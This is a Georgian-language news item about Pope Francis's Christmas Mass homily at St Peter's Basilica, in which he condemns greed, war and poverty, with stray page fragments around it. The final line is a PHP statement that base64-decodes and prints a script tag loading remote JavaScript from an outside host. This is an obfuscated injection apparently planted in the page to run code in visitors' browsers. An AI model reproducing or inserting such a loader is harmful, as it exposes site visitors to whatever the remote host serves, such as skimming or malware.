celsiusi
ავერსი საქკაბელი
ვატიკანში საშობაო ლიტურგია მიმდინარეობს. მესას წმინდა პეტრეს ტაძარში რომის პაპი ფრანცისკე უძღვება.
პაპმა ქადაგებისას ყურადღება გაამახვილა ადამიანების სიხარბეზე სიმდიდრისა და ძალაუფლების მიმართ.
რომის პაპმა დაგმო ომი, ისაუბრა სიღატაკეზე, ასევე მოუწოდა ხალხს სიმამაცისკენ, რათა არ დაუშვან, რომ შიშმა და იმედგაცრუებამ მათზე გაიმარჯვოს.
„მაშინ, როდესაც ცხოველები იკვებებიან თავიანთ სადგომებში, ადამიანები ჩვენს სამყაროში ესწრაფვიან სიმდიდრესა და ძალაუფლებას, ჭამენ მეზობლებსაც, თავის ძმებსა და დებსაც. რამდენი ომი ვიხილეთ, რამდენ ადგილას. დღესაც უგულებელყოფენ ადამიანურ ღირსებასა და თავისუფლებას. როგორც ყოველთვის, ამ ადამიანური სიხარბის მთავარი მსხვერპლი ყველაზე დაუცველები არიან. ამ შობასაც, ისევე როგორც იესოს დაბადებისას, მსოფლიო ისწრაფვის ფულისკენ, ძალაუფლებისა და სიამოვნებისკენ და აღარ რჩება სივრცე ყველაზე პატარებისთვის, უამრავი არდაბადებული, ღარიბი და დავიწყებული ბავშვისთვის. ვფიქრობ პირველ რიგში ბავშვებზე, რომლებიც შთანთქა ომმა, სიღატაკემ და უსამართლობამ. არ მისცეთ ნება შიშს, შეგუებასა და იმედგაცრუებას, თქვენზე გაიმარჯვოს. ბაგაში მწოლიარე იესო გვიჩვენებს, რომ სიცოცხლის რეალური სიმდიდრე არა ფულსა და ძალაუფლებაში, არამედ ურთიერთობებსა და ადამიანებშია. არ დაუშვათ, რომ ამ შობამ სიკეთის კეთების გარეშე ჩაიაროს“, – განაცხადა რომის პაპმა ქადაგებისას.
ხვალ, ტრადიციულად, რომის პაპი ფრანცისკე წმინდა პეტრეს ტაძრის აივნიდან მორწმუნეებს „ურბი ეთ ორბი“ ქადაგებით მიმართავს და შობას სხვადასხვა ენაზე მიულოცავს.
390
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");